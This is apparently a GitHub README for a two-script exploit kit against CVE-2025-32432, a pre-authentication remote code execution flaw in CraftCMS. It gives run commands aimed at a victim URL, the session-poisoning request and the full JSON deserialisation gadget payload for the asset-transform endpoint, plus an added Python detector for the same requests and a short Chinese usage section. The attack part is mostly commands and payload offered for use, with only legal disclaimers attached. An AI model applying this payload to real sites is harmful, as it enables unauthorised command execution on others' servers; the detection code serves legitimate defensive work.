Pre-auth Remote Code Execution for CraftCMS 3.x / 4.x / 5.x
PoC Maintainer: C.T.Y. (research use only)
Vulnerability Discovery: Nicolas Bourras – Orange Cyberdefense
Additional PoC Inspiration: SensePost research & Chirag Artani’s public script
This repository bundles two complementary Python exploits for CVE-2025-32432 — a pre-authentication RCE in CraftCMS’ asset-transform endpoint.
| Script | Purpose |
|---|---|
| `craftcms_rce_php_check.py` | Safety probe — sends one request using the FnStream gadget to verify whether arbitrary PHP executes (prints phpinfo() output). Ideal for low-impact confirmation. |
| `craftcms_final_payload.py` | Full exploit — two-packet chain: first implants PHP via FnStream, then leverages the FieldLayoutBehavior → PhpManager gadget to execute any shell command. |
The second script is the one described throughout this README.
The first script is included for completeness and quick validation, courtesy of Chirag Artani — see Credits.
Script filename was adapted for clarity; original structure & idea by Chirag Artani.
For educational & authorised security testing only.
Using these scripts against systems without explicit written permission is illegal and unethical.
- One-shot two-packet RCE
- Automatic `assetId` brute-force (404 → 302 heuristic)
- Custom shell-command execution (`-c/--cmd`)
- Works over HTTP or HTTPS (SSL-verification warnings suppressed)
- Clean extraction of command output from HTML response

Requirements:

- Python 3.8+
- PyPI packages (install via `pip install -r requirements.txt`): `requests`, `urllib3`
```bash
# Clone the repo
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt
# Install dependencies
pip install -r requirements.txt
```

```bash
python3 craftcms_rce_php_check.py -u https://victim.com
```

If you see phpinfo() output, the target is very likely exploitable.

```bash
python3 craftcms_final_payload.py -u https://victim.com -c "id"
```

| Option | Long form | Description | Required |
|---|---|---|---|
| `-u` | `--url` | Target base URL (no trailing slash) | ✅ |
| `-c` | `--cmd` | Shell command to run | ✅ |
| `-a` | `--asset` | Known good assetId | ❌ |
| `-s` | `--scan-max` | Brute limit (default: 300) | ❌ |
- Session Poisoning — GET to `/index.php?p=admin/dashboard&a=<?=...?>` writes arbitrary PHP into `/tmp/sess_<ID>`.
- Deserialisation Gadget — POST to `actions/assets/generate-transform` with a `FieldLayoutBehavior → PhpManager` gadget forces CraftCMS to `require()` the session file, executing the code.

```json
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}
```

Affected versions:

- CraftCMS < 3.9.15 (requires `assetId` brute-force)
- CraftCMS < 4.14.15
- CraftCMS < 5.6.17
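As an added defender-side example (not one of this repository's scripts), the following Python flags request records that match the two stages described above. The record format, the constructed `SAMPLE_REQUESTS` and the `classify` / `_has_gadget` helpers are assumptions for this illustration, not part of CraftCMS or the PoC:

```python
import json
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample request records (not real traffic): method, URI and raw body.
SAMPLE_REQUESTS = [
    # Stage 1 shape: PHP short tag in the "a" parameter of the admin dashboard route.
    {"method": "GET", "uri": "/index.php?p=admin/dashboard&a=%3C%3F%3D1%3F%3E", "body": ""},
    # Stage 2 shape: transform request whose handle carries a __class override.
    {"method": "POST", "uri": "/index.php?p=actions/assets/generate-transform",
     "body": json.dumps({"assetId": 11, "handle": {"width": 1, "height": 1,
             "as hack": {"class": "craft\\behaviors\\FieldLayoutBehavior",
                         "__class": "yii\\rbac\\PhpManager",
                         "__construct()": [{"itemFile": "/tmp/sess_PLACEHOLDER"}]}}})},
    {"method": "GET", "uri": "/index.php?p=admin/dashboard", "body": ""},
    {"method": "POST", "uri": "/index.php?p=actions/assets/generate-transform",
     "body": json.dumps({"assetId": 11, "handle": "thumbnail"})},
]

PHP_OPEN_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

def _has_gadget(node):
    """True if any nested object carries the Yii __class / __construct() keys."""
    if isinstance(node, dict):
        if "__class" in node or "__construct()" in node:
            return True
        return any(_has_gadget(v) for v in node.values())
    if isinstance(node, list):
        return any(_has_gadget(v) for v in node)
    return False

def classify(req):
    """Return the detection labels that apply to one request record."""
    hits = []
    parsed = urlparse(req["uri"])
    qs = parse_qs(parsed.query, keep_blank_values=True)
    # Craft routes via the "p" parameter or via the path itself; accept both.
    route = (qs.get("p") or [parsed.path])[0].strip("/")
    # Stage 1: a PHP open tag in any query value ends up in the session file.
    if any(PHP_OPEN_TAG.search(unquote(v)) for vals in qs.values() for v in vals):
        hits.append("session-poisoning")
    # Stage 2: a transform POST whose JSON body smuggles a __class override.
    if req["method"] == "POST" and route.endswith("actions/assets/generate-transform"):
        try:
            body = json.loads(req["body"] or "{}")
        except ValueError:
            body = {}
        if _has_gadget(body):
            hits.append("phpmanager-gadget")
    return hits
```

The `__class` / `__construct()` keys are Yii's object-configuration syntax and never appear in a legitimate transform handle, so matching on them catches variants that swap the gadget class while leaving normal transform traffic alone.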
- Original Advisory — Nicolas Bourras / Orange Cyberdefense
- SensePost Deep-Dive Blog
- Chirag Artani’s PoC
- CraftCMS Security Advisory
- CVE-2025-32432 @ MITRE
- C.T.Y. — Full two-packet PoC & documentation
- Chirag Artani — Original `phpinfo` check script (`craftcms_rce_php_check.py`) and early research ideas. Script filename was adapted for clarity; original structure & idea by Chirag Artani.
- Nicolas Bourras / Orange Cyberdefense — Vulnerability discovery and responsible disclosure
- Additional insights from SensePost research team
Responsibility Notice: Any legal risks or damages arising from the use of this code are solely the responsibility of the user.
MIT License — see LICENSE.
| File | Purpose |
|---|---|
| `craftcms_rce_php_check.py` | PHP execution feasibility check: a single request that uses FnStream to trigger phpinfo(), verifying in a low-impact way whether the target is vulnerable. This filename was adjusted for clarity; the original concept and program structure are by Chirag Artani. |
| `craftcms_final_payload.py` | Full two-packet chain exploit: first implants PHP via FnStream, then executes arbitrary commands via PhpManager. |

For educational and legally authorised testing only. Unauthorised use is illegal.

```bash
python3 craftcms_rce_php_check.py -u https://目標站
python3 craftcms_final_payload.py -u https://目標站 -c "id"
```

Parameters are the same as in the English version.

- Chirag Artani — `phpinfo` check script. This filename was adjusted for clarity; the original concept and program structure are by Chirag Artani.
- Nicolas Bourras / Orange Cyberdefense — Vulnerability discovery and technical inspiration
- SensePost — Technical inspiration

Any legal risk or loss arising from use of this code is borne solely by the user.

MIT License